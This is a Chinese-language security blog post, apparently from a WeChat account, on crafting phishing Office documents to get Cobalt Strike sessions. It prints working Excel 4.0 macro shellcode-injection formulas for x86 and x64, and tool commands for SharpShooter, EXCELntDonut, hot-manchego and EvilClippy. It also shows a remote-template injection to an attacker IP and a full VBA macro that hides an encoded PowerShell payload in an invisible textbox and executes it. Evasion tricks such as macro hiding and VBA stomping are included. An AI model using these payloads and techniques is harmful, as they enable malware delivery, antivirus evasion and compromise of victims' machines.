原创 | 再聊钓鱼文档

  • A+
所属分类:安全文章
原创 | 再聊钓鱼文档
点击上方“蓝字”,发现更多精彩。


之前写过类似的钓鱼文档的文章,今天再来水一篇,希望能对大家有所帮助。


原创 | 再聊钓鱼文档
一、XLM Macro(Excel 4.0)
原创 | 再聊钓鱼文档


与一般的office文档不同的是,其格式为XLM,不同于其他的XML,XLM被创建于1992年,比VBA还要早出很多。

原创 | 再聊钓鱼文档

下面我们看一个简单的demo:

原创 | 再聊钓鱼文档

这项技术在2018年,在这个文章中被指出:
https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/

由此也衍生出了很多的相关项目,

比如(Excel4-DCOM:https://github.com/outflanknl/Excel4-DCOM):
Invoke-Excel4DCOM -ComputerName server01 -Payload C:temppayload.bin

其也是依靠XLM的来调用win32API来实现远程线程注入:
原创 | 再聊钓鱼文档SharpShooter:https://github.com/mdsecactivebreach/SharpShooter

利用该工具创建XLS Macro的方法如下:

SharpShooter.py --payload slk --output foo --rawscfile ~./x86payload.bin --smuggle --template mcafee

生成的SLK文件如下:
原创 | 再聊钓鱼文档原理基本类似。不过这种都是基于X86的,X64有一些问题,有一篇文章(https://www.cybereason.com/blog/excel4.0-macros-now-with-twice-the-bits)介绍了该问题。

原创 | 再聊钓鱼文档

最后衍生的工具:
https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a
也就是在x64中使用QueueUserAPC来进行注入。
当然还有很多相关的工具
(Macrome:https://github.com/michaelweber/Macrome、EXCELntDonut:https://github.com/FortyNorthSecurity/EXCELntDonut)等等。

进程注入


在XLS中支持win32的调用,也就意味着我们可以进行进程注入等操作。调用方式如下:
REGISTER(module_name, procedure_name, type, alias, argument, macro_type, category)

原创 | 再聊钓鱼文档

需要注意的是,区分x86与x64,x86的demo如下:
=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)=REGISTER("Kernel32","WriteProcessMemory","JJJCJJ","WProcessMemory",,1,9)=REGISTER("Kernel32","CreateThread","JJJJJJJ","CThread",,1,9)=Valloc(0,65536,4096,64)=SELECT(B1:B999,B1)=SET.VALUE(D1,0)=WHILE(ACTIVE.CELL()<>"excel")=SET.VALUE(D2,LEN(ACTIVE.CELL()))=WProcessMemory(-1,A10+(D1*255),ACTIVE.CELL(),LEN(ACTIVE.CELL()),0)=SET.VALUE(D1,D1+1)=SELECT(,"R[1]C")=NEXT()=CThread(0,0,A10,0,0,0)=HALT()

x64demo如下:
=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)=WHILE(A22=0)=SET.VALUE(A22,Valloc(A21,65536,12288,64))=SET.VALUE(A21,A21+262144)=NEXT()=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)=SELECT(C1:C3479,C1)=SET.VALUE(D1,0)=WHILE(ACTIVE.CELL()<>"EXCEL")=SET.VALUE(D2,LEN(ACTIVE.CELL()))=RTL(A22+(D1*10),ACTIVE.CELL(),LEN(ACTIVE.CELL()))=SET.VALUE(D1,D1+1)=SELECT(,"R[1]C")=NEXT()=Queue(A22,-2,0)=Go()=SET.VALUE(A22,0)=HALT()

这里方便起见直接使用EXCELntDonut来生成。使用Cs生成shellcode,然后替换到指定位置:

原创 | 再聊钓鱼文档

然后运行:
EXCELntDonut -f exe_source.cs -r System.Windows.Forms.dll

原创 | 再聊钓鱼文档

然后将数据插入,并处理

原创 | 再聊钓鱼文档

原创 | 再聊钓鱼文档

然后执行即可。可惜测试时一直失败。

原创 | 再聊钓鱼文档

Evasion

效果相等:

原创 | 再聊钓鱼文档

宏隐藏

(https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/b9ec509a-235d-424e-871d-f8e721106501):

原创 | 再聊钓鱼文档即改成02

原创 | 再聊钓鱼文档

此时已无法显示隐藏:

原创 | 再聊钓鱼文档

EPPLUS:EPPlus 5-Excel spreadsheets for .NET

EPPLUS是一个用来生成Excel的.net库。https://github.com/EPPlusSoftware/EPPlus

利用该程序可以更改的免杀excel,demo:https://github.com/FortyNorthSecurity/hot-manchego

用法:
C:WindowsMicrosoft.NETFrameworkv4.0.30319csc.exe /reference:EPPlus.dll hot-manchego.cshot-manchego.exe blank.xlsm vba.txt

执行宏,获取Cs会话。

原创 | 再聊钓鱼文档

原创 | 再聊钓鱼文档
二、Powerpoint
原创 | 再聊钓鱼文档


这种攻击则利用的是鼠标轨迹来进行操作,比如鼠标点击、鼠标移动等。操作如下:

原创 | 再聊钓鱼文档

插入Cs生成的hta文件。点击时,

原创 | 再聊钓鱼文档

Cs上线。

原创 | 再聊钓鱼文档
三、远程加载文档
原创 | 再聊钓鱼文档



每一个文档都是一个zip文件,解压,编辑

原创 | 再聊钓鱼文档

修改为:

<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://192.168.1.106/1.dotm" TargetMode="External"/>

原创 | 再聊钓鱼文档此时打开文档,运行宏即可上线。


原创 | 再聊钓鱼文档
四、控件
原创 | 再聊钓鱼文档


Sub Main()On Error Resume NextcreateTextBoxsExecuteTextBoxCommandsEnd SubSub createTextBoxs()On Error Resume NextDim objTextBox As ShapeDim secretkey As LongDim str As StringDim zHf As StringDim payload As Stringpayload = "H4sIAAAAAAAAAK1WaW/iShb9nPwKf4gEKCQBs4U3ivQAYzDGxmA2kxdFZbuAMuWtvGDzpv/7lA2k09PpmZZmkJCr7LucOnepq8Lw"payload = payload + "QQ0JMkLJNSHzsIQkQK7DsLe328gxwmydLd53MHz3iGu8A9MkMAiYv29vFECAzRTvYkDebdeMMCwz+SYThGZEYOnm5vYmfxU5AdjC"payload = payload + "dweEKIbvNgz3rhkwL0zxteN5nGsD5Lz98UcvIgQ64Xn/OIBhJwigrWMEg2KJ+Sez2kMCHya6BY2Q+Zu5e38cYFcH+CKW9oCxp6fo"payload = payload + "OGb2bewaIDvBo+phFBYLf/1VKL0+VN8e+34EcFAsqGkQQvvRxLhQYr6VMofz1IPFgoQM4gbuNnxcIafGPi5y9HIOXjpjL5QuJ9t5"payload = payload + "gJ7j14fMrJ51igW6VCg3nTOHhTLzmvl7fXtj/vxAM4ucENnwUXBCSFxPhSRGBgweh8AxMZzBLVUrBDRmzq5QoiAIDCPiMFcsVC92"payload = payload + "D7B450QYl6nd19+1+1aU4fFK7u8qFT8rUSklJKXyJSd+hw4pz5uzOXqcn9B/Sq4S/f2UYKXbb1+lqgkx3IEQvoeU30+5entz85ov"payload = payload + "IT1PUXEDlOu9MJUyI1EQIHRJmoVzTiJYevsen7Pbq2ZQ/qWh6lXronMOzxnHC/O6dJH5dntTur1kT/b+XY8QNiHJvv+6Gji4RQ7k"payload = payload + "UgfYyLgmfPGrmMEthjkfj1cxmeIsFi4foMld2ClkhL7+rNa3Ufih2z2D6xg07gFFRVOi9COYcwyLBcGRoE35O+9pmt5taZnBq/Sl"payload = payload + "tNKr92yf5XIPgyAoM0pE69woMyoEGJplpuME6PKpE4Vuvix8hytFOEQGCMKrubfSF5ReXPdch1ZMZNDoUhrmqgcNBHDGSpkZIhN2"payload = payload + "UxXtrhAKX3LSAxjTkqOWYhoT+ibjQg2znCFm+d/zo/SowlCwPQxtKp13IR6DHe05l4rK0w3soFn4D7CvdXIuioyrK0mfQNMEULEb"payload = payload + "lpklIiHta4XyT4n3v8H7scX8ALNH4CWQxbwQhS1t6OcuQNkJ0Ik2Y+gzz6WsBF+7aZjVUm7GyK6blw+ic1pJSJV44tpdEMBmXc17"payload = payload + "XLFQY6Nd0lbGzVSyBHaUao6cGM6S9GN+AJr7ZMpGrjEPiT/sc3Q/M9ggwAPs6fuxD5KxZSXt3jrtKx12jJqogYRo3D05PDJsqjed"payload = payload + "uNqsTYRY5l0ctMQev1oAZPm5r8iuV80+SMcno7knExa62lH2hVjpmKvYaNqiyzdDqruM+pFH+tFE0aKxP7YFVN/H3DIcxcLgeSiy"payload = payload + "GnjGegvm+qaf+dL8XQyy/amd7ZHfgyTzo1H2Ya3ahKtRS3M8BFfR7nSUkWGeOMiO6PvIlQwvqMknY3s4WMCrLtRDVZwvNmvKTRX4"payload = payload + "hNebRNU8HC87i0NN2ZAcW8xTjHKGExns6KR5h4259Ps1RRcWQ0z8aITsp2kqpBcZe5Sqapc+xY0p+s8N88SmQ68OmgRRThPqp5Xx"payload = payload + "aywCS1hNHGPNI9vYs9zMMtp25Dco7vpQHonrhPjhiPgx9hsTxchw53qZ/LSOJ1Uq7+vWWAT3ApIs0D4FYxHG2TpVODFJBUt4jrqZ"payload = payload + "HjdIsL48WF61Dpsjh8XTNteWoCfaUjxTm7Mu6K6T+27aHyxUMx0kHW4trp86+nbnBq2DI3X1eijMOi2LsLzJpz01RYcnvD7E7Hij"payload = payload + "zPGgsmhMogrkYCqzi/5mxtmj/uxQXQ+mcjTnsTivtHtcV5P7R2k87SeTRWW0Vg+8MtvvON3p+pudBLiZpHVqMxoPU1ryHU5fGxw/"payload = payload + "raiDjlxbLLxhZu9sw41EVe6tZ5u+IE3WvV2j20Lb0xPeWa1D41CVN+0F2R21mWDp3hYE7BE1gHrfirzOXN427bm7ZTdNQYOVJQSg"payload = payload + "eqqAlup3dhOzJ676+/V4IdaaRnP69BwYadVSWEGdP8faUF7K4ux5GRw30ugETZ+7r7DcWtr5glLbhEHYqlYPykwTLHmkVO6TrZxU"payload = payload + "HWEyu190h9I8iWuidtQAqVQr3LY+8AbcsO1BzK0XVb/fdNd7rr6vI3u8DFvjCm0fdrNXc+yFtnna1FyV666D8XxUG+0loOimtrfm"payload = payload + "aNDg96fB0FdOvUa9Fh/1+kpqrCSho1U7w+kgGdvyuj4YidOBYGlebY5dvnrOaX9Dc5XWqKgLp6xWRaDlNStuYN08JuGJBa3u0RhE"payload = payload + "fkL/FZqT9ysqe8xkfJ+leS3pK/9I8xo0OafT1K1lY8n7vRkRoh6te70Ca2ELpJolULvGPTeO5ZZR6wqgT+PJzwK5v6uo/WRhGcg3"payload = payload + "5ruXl7xVbl1Cp58kmyj+wdDnAw6Zj4ZH2xxtr9n7+/u8Jd58fHq9S96uY+TH/kFPqLla4/bm23VeiMGnrvmr6UwCJNgDTLspnbCu"payload = payload + "9yPvEv4yJykuyjSKxa9H+wMkDsR07KWD8fVW6WDsGtlk94sR68+Pvk9vzwVd1tgvV6XvF0SpdL369Gi7zcefyxGvU+D3q2RDz1f+"payload = payload + "ROQYOrtwX2YqSa1SqWTPeoVa+31ieq6XFj/slbP57xOUz65w7upjYCORY8P/Ywx+8Prf2c34y2fI7+zliL6mLLuU/wU5qB694w0A"payload = payload + "AA=="zHf = " -NoP -NonI -Command ""Invoke-"zHf = zHf + "Expression $(New-Object IO.StreamReader ($(New-O"zHf = zHf + "bject IO.Compression.DeflateStream ($(New-Object"zHf = zHf + " IO.MemoryStream (,$([Convert]::FromBase64String"zHf = zHf + "("" " & payload & " "" )))), [IO.Compression.Compr"zHf = zHf + "essionMode]::Decompress)), [Text.Encoding]::ASCI"zHf = zHf + "I)).ReadToEnd();Read-Host;"""secretkey = RGB(1, 33, 7)Debug.Print "Adding Embedded Command Shape Into Document"Set objTextBox = ActiveDocument.Shapes.AddTextbox(msoTextOrientationHorizontal, 0, 0, 0, 0)With objTextBox .TextFrame.TextRange.Text = "powershell.exe|" + zHf + "|open|1" .Name = "Shell.Application" .Height = 1 .Width = 1 .Visible = msoFalse .Shadow.Visible = True .Shadow.ForeColor.RGB = secretkey If .Shadow.ForeColor.RGB <> secretkey Then Debug.Print "Fail to set secret key" End If Debug.Print "Secret Key For Command Shape: " & CStr(.Shadow.ForeColor.RGB) .AlternativeText = "ShellExecute" .TextFrame.TextRange.Font.TextColor.RGB = ActiveDocument.Background.Fill.BackColorEnd WithEnd SubSub ExecuteTextBoxCommands()On Error Resume NextDim objCmdShape As ShapeDim secretkey As LongDim cmdParams() As StringDim cmdCommand As StringDim cmdType As StringDim cmdObj As Objectsecretkey = RGB(1, 33, 7)For x = 1 To ActiveDocument.Shapes.Count Set objCmdShape = ActiveDocument.Shapes(x) If objCmdShape.Shadow.ForeColor.RGB = secretkey Then Debug.Print "Discovered Command Text Object" cmdType = objCmdShape.Name cmdCommand = objCmdShape.AlternativeText cmdParams = Split(objCmdShape.TextFrame.TextRange.Text, "|") Debug.Print "Command Type To Execute: " & cmdType Debug.Print "Command To Execute: " & cmdCommand Debug.Print "Command Params to Execute: " & Join(cmdParams, " & ") Set cmdObj = Interaction.CreateObject(cmdType) VBA$.[Interaction].CallByName! cmdObj, [cmdCommand], VbMethod, cmdParams(0), cmdParams(1), cmdParams(2) objCmdShape.Delete ActiveDocument.Save Exit For End IfNextEnd Sub

这中攻击手法,没有太神奇的地方,主要就是利用宏去创建一个不可见的控件,然后调用去执行恶意代码。上面给出的代码不可直接使用,需要更改里面的powershell部分,就留给各位读者自行补全了。

原创 | 再聊钓鱼文档
五、VBA Stomping
原创 | 再聊钓鱼文档



直译过来就是VBA重踏。怎么去理解这个东西呢,比如说我们创建一个基础的VBA代码:

原创 | 再聊钓鱼文档


当我们解压该文档,并将其使用0填充时,依旧可以去执行,就行下面这样:

原创 | 再聊钓鱼文档

改为:

原创 | 再聊钓鱼文档

此时仍然可以使用。

武器化:https://github.com/outflanknl/EvilClippy

编译命令:
csc /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs

原创 | 再聊钓鱼文档

使用方法:
EvilClippy.exe -s fakecode.vba -t 2016x86 macrofile.doc

这样你便可以得到一个处理好的文档。

上面介绍了一些常见的钓鱼文档的操作,希望能给大家带来帮助,结合使用,效果更加。

原创 | 再聊钓鱼文档
原创 | 再聊钓鱼文档
原创 | 再聊钓鱼文档



原创 | 再聊钓鱼文档
你要的分享、在看与点赞都在这儿~

本文始发于微信公众号(SecIN技术平台):原创 | 再聊钓鱼文档

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: